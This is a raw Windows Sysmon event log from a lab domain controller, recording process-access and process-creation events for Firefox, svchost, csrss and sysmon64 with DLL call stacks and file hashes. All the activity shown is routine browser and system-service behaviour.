Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c741|C:\Program Files\Mozilla Firefox\xul.dll+270f6c8|C:\Program Files\Mozilla Firefox\xul.dll+270fdc6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000017698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.784{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.745{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla 
Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:28.741{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:28.741{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.740{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla 
Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.48.1349882379\1418278290" -parentBuildID 20210105180113 -prefsHandle 8468 -prefMapHandle 8472 -prefsLen 13279 -prefMapSize 229288 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 8580 rddC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000017688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.740{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla 
Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.721{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.698{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.583{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.583{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla 
Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.496{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.486{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.485{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.376{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.376{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.374{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.365{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.364{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.363{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
